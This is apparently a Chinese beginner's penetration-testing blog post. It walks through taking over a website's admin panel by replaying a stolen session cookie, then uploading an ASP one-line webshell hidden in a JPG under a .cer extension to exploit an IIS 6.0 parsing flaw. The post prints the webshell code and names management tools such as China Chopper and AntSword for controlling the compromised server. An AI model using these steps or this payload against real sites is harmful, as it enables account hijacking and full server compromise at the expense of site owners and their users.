前言：

根据前一篇文章已经得到了cookie，那么我们怎么拿到一个网站的最高权限呢？

新手学习Xss跨站脚本攻击-存储型XSS漏洞实战）

9月7日 16:55

04413

并且得到通过下面篇文章我们得到后台地址

新手学习SQL漏洞注入-绕过WAF过滤-（附实战练习）

9月6日 14:27

0426

一：登录后台

打开测试地址如下：

出现这样的一个页面，那么现在需要修改cookie达到登录系统的目的。绕过登录密码，下面介绍两种方法：

1.打开网站，以必应浏览器为例，F12打开控制台，找到cookie 对图中3  4的值进行修改，修改的内容为你获取到的cookie的内容，3 4分别对应cookie中 “=”左右的内容

修改后点击“准备好了吗”或者刷新页面，因为cookie已经被修改，顺利登录系统。

2.配合bp拦截修改cookie登录后台

进入到管理页面

确定上传位置

确定木马格式

翻了半天,找到添加产品位置可以上传文件

通过对后台页面研究发现，此处可能有机会上传一句话木马，且上传类型限制为白名单

根据之前收集的信息，网站为iis6.0，ASP的环境,看到cer文件，可能存在IIS解析漏洞:IIS6.0 默认的可执行文件除了asp还包含这三种 *.asa *.cer *.cdx，所以我们上传asp一句话获取shell， 

随便找一张jpg图片（正常的），选择属性--->双击--->写入一句话木马，

密码是cmd eval是个函数，request是接受参数的。 

推荐阅读

渗透干货｜史上最全一句话木马附管理工具 -- Alien

7月8日 03:14

01026

<%eval request("cmd")%>

上传Shell

用一句话木马管理工具连接，这儿就不推荐了，有很多，比如菜刀，蚁剑等

成功拿到权限